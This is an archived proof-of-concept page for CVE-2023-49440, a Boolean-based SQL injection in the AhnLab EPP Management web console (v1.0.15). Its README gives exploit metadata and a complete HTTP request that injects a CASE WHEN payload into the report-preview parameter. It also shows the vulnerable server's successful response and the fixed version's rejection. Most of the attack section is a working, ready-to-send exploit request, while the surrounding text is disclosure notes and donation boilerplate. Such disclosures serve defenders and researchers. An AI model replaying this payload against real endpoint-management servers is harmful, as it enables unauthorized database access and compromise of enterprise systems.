Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-49440 PoC — AhnLab EPP 安全漏洞

Source
https://github.com/NyaMeeEain/CVE-2023-49440
Associated Vulnerability
Title:AhnLab EPP 安全漏洞 (CVE-2023-49440)
Description:AhnLab EPP是韩国AhnLab公司的一套终端安全防护平台。 AhnLab EPP 1.0.15版本存在安全漏洞,该漏洞源于对参数preview的错误操作,可能导致SQL注入攻击。
Readme
# CVE-2023-49440-POC
```
Exploit Title: ***AhnLab EPP Management(Centralised Endpoint Security Management) - Boolean-based-SQL-Injection SQL Injection that led to RCE***

Date: 16 July 2023


CVE : CVE-2023-49440

Vendor Homepage: https://www.ahnlab.com/en

Software Link:https://www.ahnlab.com/ko/product/epp-management

Product Reveiw:https://www.gartner.com/reviews/market/endpoint-protection-platforms/compare/product/ahnlab-edr-vs-ahnlab-epp

Refence Link: https://www.cve.org/CVERecord?id=CVE-2023-49440

Vulnerable Version: 1.0.15 and before

Fix Version: later 1.0.15 version released (2023)

***Vulnerability and Product description***:

AhnLab EPP Management is a globally recognized next-generation advanced endpoint protection platform that integrates patch management, advanced malware detection, EDR, and XDR capabilities to provide centralised management, real-time monitoring, and policy control across enterprise endpoints. A Boolean-based and time-based SQL injection was discovered in the web admin interface of AhnLab EPP Management v1.0.15, which led to full compromise of the backend database with administrative privileges and limited remote code execution (RCE). Several endpoints were vulnerable to A Boolean-based SQL Injection vulnerability, such as **Preview*** parameter within the JSON, etc.’All affected endpoints were patched in releases after v1.0.15, and fixes were applied in 2023.

***This is proof of reproduction for a Boolean-based SQL injection in AhnLab EPP Management. however, I will not release the Python PoC for security reasons until next year, and the affected version was patched over two years ago***
```
### Request
```
POST /api/console/ems/query/report/preview HTTP/1.1
Host: 192.168.100.199:8803
Cookie: lang_set=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json; charset=utf-8
Accept-Language: de-CA,en-US;q=0.5,vi;q=0.3
Accept-Encoding: gzip, deflate
Authorization: bearer<Token>
Content-Type: application/json; charset=utf-8
Content-Length: 180
Origin: https://192.168.100.199:8803
Referer: https://192.168.100.199:8803/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{
  "request": {
    "action": "preview_query_report",
    "revision": 1,
    "params": [
      "RDB",
      "(SELECT CONCAT(CONCAT('apple',(CASE WHEN (1010=1010) THEN '1' ELSE '0' END)),'mango'))" a"
    ]
  },
  "data": []
}
```

### Response

```
HTTP/1.1 200
strict-transport-security: max-age=0
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-type: application/json; charset=utf-8
content-length: 135
date:  21 may 2023 11:48:00 GMT
cache-control: no-cache, no-store, no-control
connection: close

{
  "error_code": "EPP-00000",
  "error_msg": "success",
  "revision": 1,
  "response": [
    {
      "report": "[{\"concat\":\"applemango\"}]",
      "item_order": 1
    }
  ]
}

```

### Fixed Version

### Request

```
POST /api/console/ems/query/report/preview HTTP/1.1
Host: 192.168.100.199:8803
Cookie: lang_set=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json;charset=utf-8
Accept-Language: de-CA,en-US;q=0.5,vi;q=0.3
Accept-Encoding: gzip, deflate, br
Authorization: bearer <Token>
Content-Type: application/json;charset=utf-8
Content-Length: 241
Origin: https://192.168.100.199:8803
Referer: https://192.168.100.199:8803/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{
  "request": {
    "action": "preview_query_report",
    "revision": "1",
    "params": [
      "RDB",
      "1",
      "(SELECT CONCAT(CONCAT('apple', (CASE WHEN (1337=1337) THEN '1' ELSE '0' END)), 'mango'))"
    ]
  },
  "data": {
    "extract_key": "<Key>="
  }
}

```
### Response
```

HTTP/1.1 200
strict-transport-security: max-age=0
x-frame-options: DENY
x-content-type-options: nosniff
content-type: application/json;charset=utf-8
content-length: 181
date: 16 Sept 2023 10:28:10 GMT
cache-control: no-cache,no-store,no-control
connection: close

{
  "error_code": "SWU-00027",
  "error_msg": "[SWU-00027] Conceal key expired. : \"\\\"extract_key\\\":\\\"<Key>=\\\"\"",
  "revision": 1,
  "response": [
  ]
}

```
File Snapshot

 [4.0K]  /data/pocs/b7a4fb3193e66495d664b2892b552c32ffeecfe3
└── [4.2K]  README.md

1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.